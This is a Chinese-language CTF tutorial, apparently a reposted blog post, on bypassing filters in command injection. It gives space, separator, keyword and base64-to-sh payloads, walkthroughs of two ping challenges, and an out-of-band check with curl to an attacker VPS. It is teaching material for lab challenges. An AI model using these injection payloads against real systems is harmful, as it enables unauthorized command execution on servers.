CTF之命令执行常见绕过

命令执行常见绕过

1.空格代替

当我们执行系统命令时,不免会遇到空格,如cat flag.txt,当空格被程序过滤时,便需要利用以下字符尝试代替绕过:

<
${
    
    IFS}
$IFS$9
%09

测试如下:
在这里插入图片描述

$IFS 在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。

2.截断符号代替

当命令执行时,通常会从前端获取数据执行系统预设定的命令,为了加上我们想要执行的其他命令,通常会使用截断符号让系统去执行其他命令:
如:ping 127.0.0.1|whoami

常见的截断符号:
$
;
|
-
(
)
`
||
&&
&
}
{
    
    
%0a

3.cat命令代替

cat命令为查看,当程序禁用cat命令时,可采用以下命令代替:

cat:由第一行开始显示内容,并将所有内容输出
tac:从最后一行倒序显示内容,并将所有内容输出
more:根据窗口大小,一页一页的现实文件内容
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head:只显示头几行
tail:只显示最后几行
nl:类似于cat -n,显示时输出行号
tailf:类似于tail -f
sort%20/flag 读文件

在这里插入图片描述

3.1 反斜杠绕过

ca\t fl\ag.txt

在这里插入图片描述
3.2 编码绕过

`echo 'Y2F0Cg==' | base64 -d`  flag.txt

在这里插入图片描述
3.3 拼接绕过

a=c;b=at;c=f;d=lag;e=.txt;$a$b ${
    
    c}${
    
    d}${
    
    e}
cat flag.txt

在这里插入图片描述
3.4 单双引号绕过

c'a't  test
c"a"t  test

在这里插入图片描述

扫描二维码关注公众号,回复: 17017163 查看本文章

3.5 通配符绕过

[…]表示匹配方括号之中的任意一个字符
{…}表示匹配大括号里面的所有模式,模式之间使用逗号分隔。
{…}与[…]有一个重要的区别,当匹配的文件不存在,[…]会失去模式的功能,变成一个单纯的字符串,而{…}依然可以展开

cat  t?st
cat  te*
cat  t[a-z]st
cat  t{
    
    a,b,c,d,e,f}st

在这里插入图片描述

实战演练

1. [GXYCTF2019]Ping Ping Ping(https://buuoj.cn)

1.1 使用截断符测试

payload:/?ip=127.0.0.1|ls

可见程序已经执行了我们添加的ls命令,并回显到了前端
在这里插入图片描述
1.2 使用cat命令查看flag
根据提示,这里的空格应该被过滤了,所以得想办法绕过空格限制
在这里插入图片描述
1.3 空格绕过
根据之前知识,测试替换空格符号;
根据burp爆破,发现可以通过$IFS$9绕过
在这里插入图片描述
但是这里的提示又有了新变化,如下:
在这里插入图片描述
根据提示,这里应该是flag的问题,首先我们查看index.php查看源码
在这里插入图片描述
通过查看源码,这里对flag进行了正则匹配,若匹配到flag在一起,则会停止运行程序

1.4 关键词绕过
根据之前知识,测试替换关键词;
cat flag.php

cat$IFS$9fl\ag.php
b=ag;a=fl;cat$IFS$9$a$b.php
echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh
cat$IFS$9fla*

根据burp爆破,发现可以通过拼接编码绕过
在这里插入图片描述
1.5 通过fuzz测试,可见所有的payload如下:
在这里插入图片描述

2. 死亡ping命令(https://www.ctfhub.com)

2.1 使用截断符测试
通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符
在这里插入图片描述
根据测试,程序没有对%0a进行过滤,所以我们可以利用%0a来进行下一步
在这里插入图片描述
2.2 带外判断
上述测试中有个问题,因执行的命令无回显,我们无法得知插入的命令是否执行成功,我们可以使用命令带外测试:
简单原理:使用curl命令访问网站,做网站收到请求,则命令执行成功

  1. 在VPS上使用python起http服务:
命令:python -m http.server 80

在这里插入图片描述
2. 使用curl命令访问VPS下的80端口

Payload:ip=127.0.0.1%0acurl+VPSIP/1.txt

在这里插入图片描述

  1. 查看VPS上访问情况,成功被访问,说明命令执行成功
    在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_42383069/article/details/130221725